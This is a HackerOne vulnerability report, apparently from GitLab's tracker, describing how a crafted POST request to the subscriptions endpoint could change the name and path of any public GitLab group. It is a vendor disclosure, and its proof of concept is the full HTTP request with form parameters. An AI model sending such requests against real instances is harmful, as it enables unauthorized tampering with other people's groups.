A user can change the name and path of some public GitLab groups
HackerOne report #2035687 by zeb0x01
on 2023-06-23, assigned to @ottilia_westerlund:
Report | Attachments | How To Reproduce
Report
Summary
The following vulnerability allows an attacker to change a public gitlab groups name by just a POST request.
Steps to reproduce
- Send the following request with cookies.
POST /-/subscriptions/groups/<GROUP_NAME> HTTP/2
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/-/subscriptions/groups/gitlab-org
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
_method=patch&authenticity_token=[REDACTED]&new_user=true&group%5Bname%5D=<group_name>&group%5Bpath%5D=<group_path>&group%5Bvisibility_level%5D=20
Impact
Unauthorized access / change leading to change in group name of any public group
Relevant logs and/or screenshots
Impact
Unauthorized access / change leading to change in group name of any public group
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
Edited by Costel Maxim